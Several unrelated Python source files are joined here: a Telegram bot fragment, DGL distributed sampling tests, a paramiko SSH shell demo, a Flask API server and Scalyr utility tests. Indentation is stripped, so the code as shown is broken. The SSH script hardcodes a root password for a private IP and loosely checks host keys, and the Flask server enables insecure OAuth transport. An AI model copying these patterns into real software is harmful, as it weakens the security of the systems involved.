y = re.findall("^Transferred:", toutput.decode("utf-8", "ignore"))
z = re.findall("^ * ", toutput.decode("utf-8", "ignore"))
if y:
val = str(toutput.decode("utf-8", "ignore"))
val = val.split(",")
percent = str(val[1])
statu = val[1].replace("%", "")
fps = str(val[2])
if statu != " -":
statu = int(statu)
prog = status(statu)
if z:
working = str(
toutput.decode("utf-8", "ignore").lstrip("* ").rsplit(":", 2)[0]
)
if working1 != working or percent1 != percent:
if int(time.time()) - xtime > timeout:
cron_task(
sendmsg,
bot,
message.chat_id,
mid,
pros_message(),
percent,
fps,
prog,
working,
)
percent1 = percent
working1 = working
xtime = time.time()
# Fix Mission INFO
if utils.Mission_Done == "finished":
if utils.Mission_kill != "killed":
percent = "100%"
prog = status(100)
cron_task(
sendmsg, bot, message.chat_id, mid, cplt_message(), fps, percent, prog, ""
)
utils.Mission_Done = ""
return help(update, context)
elif utils.Mission_kill == "killed":
cron_task(
sendmsg,
bot,
message.chat_id,
mid,
kill_message(),
kill_message_info(),
"",
"",
"",
)
utils.Mission_Done = ""
utils.Mission_kill = ""
return help(update, context)
# ############################### Main ####################################
def main():
updater = Updater(settings.TOKEN, use_context=True,)
dp = updater.dispatcher
# Entry Conversation
conv_handler = ConversationHandler(
entry_points=[
# Entry Points
CommandHandler("start", start),
CommandHandler("quick", quick),
CommandHandler("copy", copy),
],
states={
CHOOSE_MODE: [
# call function which judged via pattern
CallbackQueryHandler(quick, pattern="quick"),
CallbackQueryHandler(copy, pattern="copy"),
],
LINK_REPLY: [
# get Shared_Link states
CallbackQueryHandler(request_target),
MessageHandler(Filters.text, request_target),
],
TARGET_REPLY: [
# get Target_Link states
CallbackQueryHandler(recived_mission),
MessageHandler(Filters.text, recived_mission),
],
},
fallbacks=[CommandHandler("cancel", cancel),],
)
dp.add_handler(conv_handler, 2)
dp.add_handler(CommandHandler("kill", kill), 1)
dp.add_handler(CommandHandler("ver", _version))
dp.add_handler(CommandHandler("help", help))
dp.add_error_handler(error)
updater.start_polling()
logger.info("Fxxkr LAB iCopy Start")
updater.idle()
if __name__ == "__main__":
main()
|
test_distributed_sampling.py
|
import dgl
import unittest
import os
from dgl.data import CitationGraphDataset
from dgl.distributed import sample_neighbors, find_edges
from dgl.distributed import partition_graph, load_partition, load_partition_book
import sys
import multiprocessing as mp
import numpy as np
import backend as F
import time
from utils import get_local_usable_addr
from pathlib import Path
import pytest
from dgl.distributed import DistGraphServer, DistGraph
def start_server(rank, tmpdir, disable_shared_mem, graph_name):
g = DistGraphServer(rank, "rpc_ip_config.txt", 1, 1,
tmpdir / (graph_name + '.json'), disable_shared_mem=disable_shared_mem)
g.start()
def start_sample_client(rank, tmpdir, disable_shared_mem):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_sampling", gpb=gpb)
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
dgl.distributed.exit_client()
return sampled_graph
def start_find_edges_client(rank, tmpdir, disable_shared_mem, eids):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_find_edges.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_find_edges", gpb=gpb)
u, v = find_edges(dist_graph, eids)
dgl.distributed.exit_client()
return u, v
def check_rpc_sampling(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
print(g.idtype)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
def check_rpc_find_edges(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_find_edges', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_find_edges'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
eids = F.tensor(np.random.randint(g.number_of_edges(), size=100))
u, v = g.find_edges(eids)
du, dv = start_find_edges_client(0, tmpdir, num_server > 1, eids)
assert F.array_equal(u, du)
assert F.array_equal(v, dv)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling(Path(tmpdirname), 2)
def check_rpc_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64)
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64)
for i in range(num_server):
part, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_sampling_shuffle(num_server):
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling_shuffle(Path(tmpdirname), num_server)
def check_standalone_sampling(tmpdir):
g = CitationGraphDataset("cora")[0]
num_parts = 1
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_sampling", part_config=tmpdir / 'test_sampling.json')
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
dgl.distributed.exit_client()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_standalone_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'standalone'
with tempfile.TemporaryDirectory() as tmpdirname:
check_standalone_sampling(Path(tmpdirname))
def start_in_subgraph_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
dgl.distributed.initialize("rpc_ip_config.txt", 1)
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_in_subgraph.json', rank)
dist_graph = DistGraph("test_in_subgraph", gpb=gpb)
sampled_graph = dgl.distributed.in_subgraph(dist_graph, nodes)
dgl.distributed.exit_client()
return sampled_graph
def check_rpc_in_subgraph(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_in_subgraph', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_in_subgraph'))
p.start()
time.sleep(1)
pserver_list.append(p)
nodes = [0, 10, 99, 66, 1024, 2008]
time.sleep(3)
sampled_graph = start_in_subgraph_client(0, tmpdir, num_server > 1, nodes)
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
subg1 = dgl.in_subgraph(g, nodes)
src1, dst1 = subg1.edges()
assert np.all(np.sort(F.asnumpy(src)) == np.sort(F.asnumpy(src1)))
assert np.all(np.sort(F.asnumpy(dst)) == np.sort(F.asnumpy(dst1)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_in_subgraph():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph(Path(tmpdirname), 2)
if __name__ == "__main__":
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_sampling(Path(tmpdirname))
os.environ['DGL_DIST_MODE'] = 'distributed'
check_rpc_in_subgraph(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 1)
check_rpc_find_edges(Path(tmpdirname), 2)
check_rpc_find_edges(Path(tmpdirname), 1)
|
tests.py
|
# Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
import socket
import sys
from paramiko.py3compat import u
import paramiko
# windows does not have termios...
try:
import termios
import tty
has_termios = True
except ImportError:
has_termios = False
def interactive_shell(chan):
if has_termios:
posix_shell(chan)
else:
windows_shell(chan)
def posix_shell(chan):
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
# thanks to Mike Looijmans for this code
def windows_shell(chan):
import threading
sys.stdout.write("Line-buffered terminal emulation. Press F6 or ^Z to send EOF.\r\n\r\n")
def writeall(sock):
while True:
data = sock.recv(256)
if not data:
sys.stdout.write('\r\n*** EOF ***\r\n\r\n')
sys.stdout.flush()
break
            sys.stdout.write(u(data))
sys.stdout.flush()
writer = threading.Thread(target=writeall, args=(chan,))
writer.start()
try:
while True:
d = sys.stdin.read(1)
if not d:
break
chan.send(d)
except EOFError:
# user hit ^Z or F6
pass
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
print('*** Connecting...')
hostname = "172.22.202.204"
password = "Passw0rd"
username = "root"
port = 22
client.connect(hostname, port, username, password)
chan = client.invoke_shell()
interactive_shell(chan)
|
server.py
|
import asyncio
try:
import ujson as json
except ImportError:
import json
import os
import threading
import traceback
import rethinkdb as r
from flask import Flask, render_template, request, g, jsonify, make_response
from dashboard import dash
from utils.db import get_db, get_redis
from utils.ratelimits import ratelimit, endpoint_ratelimit
from utils.exceptions import BadRequest
from sentry_sdk import capture_exception
# Initial require, the above line contains our endpoints.
config = json.load(open('config.json'))
endpoints = None
app = Flask(__name__, template_folder='views', static_folder='views/assets')
app.register_blueprint(dash)
app.config['SECRET_KEY'] = config['client_secret']
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = 'true'
if 'sentry_dsn' in config:
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
sentry_sdk.init(config['sentry_dsn'],
integrations=[FlaskIntegration()])
@app.before_first_request
def init_app():
def run_gc_forever(loop):
asyncio.set_event_loop(loop)
try:
loop.run_forever()
except (SystemExit, KeyboardInterrupt):
loop.close()
gc_loop = asyncio.new_event_loop()
gc_thread = threading.Thread(target=run_gc_forever, args=(gc_loop,))
gc_thread.start()
g.gc_loop = gc_loop
from utils.endpoint import endpoints as endpnts
global endpoints
endpoints = endpnts
import endpoints as _ # noqa: F401
def require_authorization(func):
def wrapper(*args, **kwargs):
if r.table('keys').get(request.headers.get('authorization', '')).coerce_to('bool').default(False).run(get_db()):
return func(*args, **kwargs)
return jsonify({'status': 401, 'error': 'You are not authorized to access this endpoint'}), 401
return wrapper
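# Authentication note: every /api/<endpoint> request must send an API key in the
# "Authorization" header; the decorator above checks that key against the RethinkDB
# "keys" table. An illustrative call (key, host and endpoint name are hypothetical):
#     requests.get("http://localhost:5000/api/some_endpoint",
#                  params={"text": "hello"},
#                  headers={"Authorization": "example-api-key"})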
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
if hasattr(g, 'rdb'):
g.rdb.close()
@app.route('/', methods=['GET'])
def index():
data = {}
for endpoint in endpoints:
data[endpoint] = {'hits': get_redis().get(endpoint + ':hits') or 0,
'avg_gen_time': endpoints[endpoint].get_avg_gen_time()}
return render_template('index.html', data=data)
@app.route('/endpoints.json', methods=['GET'])
def endpoints_json():
    return jsonify({"endpoints": [{'name': x, 'parameters': y.params, 'ratelimit': f'{y.rate}/{y.per}s'} for x, y in endpoints.items()]})
@app.route('/documentation')
def docs():
return render_template('docs.html', url=request.host_url, data=sorted(endpoints.items()))
@app.route('/api/<endpoint>', methods=['GET', 'POST'])
@require_authorization
@ratelimit
def api(endpoint):
if endpoint not in endpoints:
return jsonify({'status': 404, 'error': 'Endpoint {} not found!'.format(endpoint)}), 404
if request.method == 'GET':
text = request.args.get('text', '')
avatars = [x for x in [request.args.get('avatar1', request.args.get('image', None)),
request.args.get('avatar2', None)] if x]
usernames = [x for x in [request.args.get('username1', None), request.args.get('username2', None)] if x]
kwargs = {}
for arg in request.args:
if arg not in ['text', 'username1', 'username2', 'avatar1', 'avatar2']:
kwargs[arg] = request.args.get(arg)
else:
if not request.is_json:
return jsonify({'status': 400, 'message': 'when submitting a POST request you must provide data in the '
'JSON format'}), 400
request_data = request.json
text = request_data.get('text', '')
avatars = list(request_data.get('avatars', list(request_data.get('images', []))))
usernames = list(request_data.get('usernames', []))
kwargs = {}
for arg in request_data:
if arg not in ['text', 'avatars', 'usernames']:
kwargs[arg] = request_data.get(arg)
cache = endpoints[endpoint].bucket
max_usage = endpoints[endpoint].rate
e_r = endpoint_ratelimit(auth=request.headers.get('Authorization', None), cache=cache, max_usage=max_usage)
if e_r['X-RateLimit-Remaining'] == -1:
x = make_response((jsonify({'status': 429, 'error': 'You are being ratelimited'}), 429,
{'X-RateLimit-Limit': e_r['X-RateLimit-Limit'],
'X-RateLimit-Remaining': 0,
'X-RateLimit-Reset': e_r['X-RateLimit-Reset'],
'Retry-After': e_r['Retry-After']}))
return x
try:
result = endpoints[endpoint].run(key=request.headers.get('authorization'),
text=text,
avatars=avatars,
usernames=usernames,
kwargs=kwargs)
except BadRequest as br:
traceback.print_exc()
if 'sentry_dsn' in config:
capture_exception(br)
return jsonify({'status': 400, 'error': str(br)}), 400
except IndexError as e:
traceback.print_exc()
if 'sentry_dsn' in config:
capture_exception(e)
return jsonify({'status': 400, 'error': str(e) + '. Are you missing a parameter?'}), 400
except Exception as e:
traceback.print_exc()
if 'sentry_dsn' in config:
capture_exception(e)
return jsonify({'status': 500, 'error': str(e)}), 500
result.headers.add('X-RateLimit-Limit', max_usage)
result.headers.add('X-RateLimit-Remaining', e_r['X-RateLimit-Remaining'])
result.headers.add('X-RateLimit-Reset', e_r['X-RateLimit-Reset'])
return result, 200
if __name__ == '__main__':
app.run(debug=False, use_reloader=False)
|
util_test.py
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# author: Steven Czerwinski <czerwin@scalyr.com>
from __future__ import unicode_literals
from __future__ import absolute_import
from scalyr_agent import compat
__author__ = "czerwin@scalyr.com"
from io import open
import re
from scalyr_agent import scalyr_init
scalyr_init()
import sys
import datetime
import os
import tempfile
import threading
import uuid
import mock
from mock import patch, MagicMock
import six
import scalyr_agent.util as scalyr_util
from scalyr_agent.util import (
JsonReadFileException,
RateLimiter,
FakeRunState,
ScriptEscalator,
HistogramTracker,
)
from scalyr_agent.util import (
StoppableThread,
RedirectorServer,
RedirectorClient,
RedirectorError,
)
from scalyr_agent.util import verify_and_get_compress_func
from scalyr_agent.util import get_compress_and_decompress_func
from scalyr_agent.json_lib import JsonObject
from scalyr_agent.test_base import ScalyrTestCase
from scalyr_agent.test_base import skipIf
from scalyr_agent.test_base import BaseScalyrLogCaptureTestCase
from scalyr_agent import scalyr_logging
class TestUtilCompression(ScalyrTestCase):
def setUp(self):
super(TestUtilCompression, self).setUp()
self._data = b"The rain in spain. " * 1000
def test_compression_none(self):
data = self._data
compress = verify_and_get_compress_func("none")
self.assertIsNotNone(compress)
self.assertEqual(data, compress(data))
compress_func, decompress_func = get_compress_and_decompress_func("none")
self.assertIsNotNone(compress_func)
self.assertIsNotNone(decompress_func)
self.assertEqual(data, compress_func(data))
self.assertEqual(data, decompress_func(data))
self.assertEqual(data, decompress_func(compress_func(data)))
def test_zlib(self):
"""Successful zlib compression"""
data = self._data
compress = verify_and_get_compress_func("deflate")
self.assertIsNotNone(compress)
import zlib
self.assertEqual(data, zlib.decompress(compress(data)))
def test_bz2(self):
"""Successful bz2 compression"""
data = self._data
compress = verify_and_get_compress_func("bz2")
self.assertIsNotNone(compress)
import bz2
self.assertEqual(data, bz2.decompress(compress(data)))
@skipIf(sys.version_info < (2, 7, 0), "Skipping Python < 2.7")
def test_lz4(self):
data = self._data
compress = verify_and_get_compress_func("lz4")
self.assertIsNotNone(compress)
import lz4.frame as lz4
self.assertEqual(data, lz4.decompress(compress(data)))
@skipIf(sys.version_info < (2, 7, 0), "Skipping Python < 2.7")
def test_zstandard(self):
data = self._data
compress = verify_and_get_compress_func("zstandard")
self.assertIsNotNone(compress)
import zstandard
decompressor = zstandard.ZstdDecompressor()
self.assertEqual(data, decompressor.decompress(compress(data)))
def test_bad_compression_type(self):
"""User enters unsupported compression type"""
self.assertIsNone(verify_and_get_compress_func("bad_compression_type"))
def test_bad_compression_lib_exception_on_import(self):
"""Pretend that import bz2/zlib raises exception"""
def _mock_get_compress_and_decompress_func(
compression_type, compression_level=9
):
raise Exception("Mimic exception when importing compression lib")
@patch(
"scalyr_agent.util.get_compress_and_decompress_func",
new=_mock_get_compress_and_decompress_func,
)
def _test(compression_type):
self.assertIsNone(verify_and_get_compress_func(compression_type))
_test("deflate")
_test("bz2")
_test("lz4")
_test("zstandard")
def test_bad_compression_lib_no_compression(self):
"""Pretend that the zlib/bz2 library compress() method doesn't perform any comnpression"""
def _mock_get_compress_and_decompress_func(
compression_type, compression_level=9
):
m = MagicMock()
# simulate module.compress() method that does not compress input data string
m.compress = lambda data, compression_level=9: data
m.decompress = lambda data: data
return m.compress, m.decompress
@patch(
"scalyr_agent.util.get_compress_and_decompress_func",
new=_mock_get_compress_and_decompress_func,
)
def _test(compression_type):
self.assertIsNone(verify_and_get_compress_func(compression_type))
_test("deflate")
_test("bz2")
_test("lz4")
_test("zstandard")
class TestUtil(ScalyrTestCase):
def setUp(self):
super(TestUtil, self).setUp()
self.__tempdir = tempfile.mkdtemp()
self.__path = os.path.join(self.__tempdir, "testing.json")
def test_read_file_as_json(self):
self.__create_file(self.__path, '{ "a": "hi"}')
value = scalyr_util.read_file_as_json(self.__path)
self.assertEquals(value, {"a": "hi"})
def test_read_config_file_as_json(self):
self.__create_file(self.__path, '{ a: "hi"} // Test')
json_object = scalyr_util.read_config_file_as_json(self.__path)
self.assertEquals(json_object, JsonObject(a="hi"))
def test_read_file_as_json_no_file(self):
self.assertRaises(JsonReadFileException, scalyr_util.read_file_as_json, "foo")
def test_read_file_as_json_with_bad_json(self):
self.__create_file(self.__path, "{ a: hi}")
self.assertRaises(
JsonReadFileException, scalyr_util.read_file_as_json, self.__path
)
def test_read_file_as_json_with_strict_utf8_json(self):
# 2->TODO python3 json libs do not allow serialization with invalid UTF-8.
with open(self.__path, "wb") as f:
f.write(b'{ a: "\x96"}')
self.assertRaises(
JsonReadFileException, scalyr_util.read_file_as_json, self.__path, True
)
def test_atomic_write_dict_as_json_file(self):
info = {"a": "hi"}
scalyr_util.atomic_write_dict_as_json_file(self.__path, self.__path + "~", info)
json_object = scalyr_util.read_file_as_json(self.__path)
self.assertEquals(json_object, info)
def __create_file(self, path, contents):
fp = open(path, "w")
fp.write(contents)
fp.close()
def test_seconds_since_epoch(self):
dt = datetime.datetime(2015, 8, 6, 14, 40, 56)
expected = 1438872056.0
actual = scalyr_util.seconds_since_epoch(dt)
self.assertEquals(expected, actual)
def test_microseconds_since_epoch(self):
dt = datetime.datetime(2015, 8, 6, 14, 40, 56, 123456)
expected = 1438872056123456
actual = scalyr_util.microseconds_since_epoch(dt)
self.assertEquals(expected, actual)
def test_uuid(self):
first = scalyr_util.create_unique_id()
second = scalyr_util.create_unique_id()
self.assertTrue(len(first) > 0)
self.assertTrue(len(second) > 0)
self.assertNotEqual(first, second)
def test_create_uuid3(self):
namespace = uuid.UUID("{aaaaffff-22c7-4d50-92c1-123456781234}")
self.assertEqual(
scalyr_util.create_uuid3(namespace, "test-string"),
uuid.UUID("{72a49a0a-d92e-383c-a88b-2060e372e1af}"),
)
def test_remove_newlines_and_truncate(self):
self.assertEquals(scalyr_util.remove_newlines_and_truncate("hi", 1000), "hi")
self.assertEquals(scalyr_util.remove_newlines_and_truncate("ok then", 2), "ok")
self.assertEquals(
scalyr_util.remove_newlines_and_truncate("o\nk\n", 1000), "o k "
)
self.assertEquals(
scalyr_util.remove_newlines_and_truncate("ok\n\r there", 1000), "ok there"
)
self.assertEquals(
scalyr_util.remove_newlines_and_truncate("ok\n\r there", 6), "ok t"
)
def test_is_list_of_strings_yes(self):
self.assertTrue(scalyr_util.is_list_of_strings(["*", "blah", "dah"]))
def test_is_list_of_strings_no(self):
self.assertFalse(scalyr_util.is_list_of_strings(["*", 3, {"blah": "dah"}]))
def test_is_list_of_strings_none(self):
self.assertFalse(scalyr_util.is_list_of_strings(None))
def test_value_to_bool(self):
self.assertTrue(scalyr_util.value_to_bool(True))
self.assertTrue(scalyr_util.value_to_bool(1))
self.assertFalse(scalyr_util.value_to_bool(0))
self.assertRaises(ValueError, scalyr_util.value_to_bool, 100)
self.assertTrue(scalyr_util.value_to_bool("something"))
self.assertFalse(scalyr_util.value_to_bool("f"))
self.assertFalse(scalyr_util.value_to_bool("False"))
self.assertFalse(scalyr_util.value_to_bool(""))
def test_get_parser_from_config_default(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
}
attributes = {"nothing": 0}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"default_parser",
)
def test_get_parser_from_config_hierarchy1(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
"parser": "config_parser",
"attributes": {"parser": "config_attributes_parser"},
}
attributes = {
"nothing": 0,
"parser": "attributes_parser",
}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"config_attributes_parser",
)
def test_get_parser_from_config_hierarchy2(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
"parser": "config_parser",
"attributes": {},
}
attributes = {
"nothing": 0,
"parser": "attributes_parser",
}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"config_parser",
)
def test_get_parser_from_config_hierarchy3(self):
config = {
"something": "something",
"other something": ["thing1", "thing2"],
"attributes": {},
}
attributes = {
"nothing": 0,
"parser": "attributes_parser",
}
self.assertEqual(
scalyr_util.get_parser_from_config(config, attributes, "default_parser"),
"attributes_parser",
)
def test_get_web_url_from_upload_url(self):
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://agent.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://log.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://upload.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://app.scalyr.com"),
"https://www.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://agent.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://log.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://upload.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://app.eu.scalyr.com"),
"https://www.eu.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://logstaging.scalyr.com"),
"https://logstaging.scalyr.com",
)
self.assertEqual(
scalyr_util.get_web_url_from_upload_url("https://logstaging.eu.scalyr.com"),
"https://logstaging.eu.scalyr.com",
)
class TestUtilWithLogCapture(BaseScalyrLogCaptureTestCase):
def setUp(self):
super(TestUtilWithLogCapture, self).setUp()
self.__logger = scalyr_logging.getLogger("util")
self.__logger.set_keep_last_record(False)
self.__tempdir = tempfile.mkdtemp()
self.__path = os.path.join(self.__tempdir, "testing.json")
self.__temp_file_path = self.__path + "~"
def test_atomic_write_dict_as_json_file_error(self):
        # Mock the internal function calls of 'atomic_write_dict_as_json_file' so they raise an error,
        # and validate the error log message.
info = {"a": "hi"}
with patch("os.rename") as os_rename_mock:
os_rename_mock.side_effect = Exception("I am an error.")
scalyr_util.atomic_write_dict_as_json_file(
self.__path, self.__temp_file_path, info
)
self.assertLogFileContainsLineRegex(expression="I am an error.")
self.assertLogFileContainsLineRegex(
expression="File path: '{0}', type: {1}".format(
re.escape(self.__path), type(self.__path)
)
)
self.assertLogFileContainsLineRegex(
expression="Temporary file path: '{0}', type: {1}".format(
re.escape(self.__temp_file_path), type(self.__temp_file_path)
)
)
self.assertLogFileContainsLineRegex(expression="File exists: False.")
self.assertLogFileContainsLineRegex(expression="Temporary file exists: True.")
self.assertLogFileContainsLineRegex(
expression="File system encoding: {0}".format(
re.escape(sys.getfilesystemencoding())
)
)
class TestRateLimiter(ScalyrTestCase):
def setUp(self):
super(TestRateLimiter, self).setUp()
self.__test_rate = RateLimiter(100, 10, current_time=0)
self.__current_time = 0
self.__last_sleep_amount = -1
def advance_time(self, delta):
self.__current_time += delta
def charge_if_available(self, num_bytes):
return self.__test_rate.charge_if_available(
num_bytes, current_time=self.__current_time
)
def block_until_charge_succeeds(self, num_bytes):
return self.__test_rate.block_until_charge_succeeds(
num_bytes, current_time=self.__current_time
)
def test_basic_use(self):
self.assertTrue(self.charge_if_available(20))
self.assertTrue(self.charge_if_available(80))
self.assertFalse(self.charge_if_available(1))
def test_custom_bucket_size_and_rate(self):
self.__test_rate = RateLimiter(10, 1, current_time=0)
self.assertTrue(self.charge_if_available(10))
self.assertFalse(self.charge_if_available(10))
self.advance_time(1)
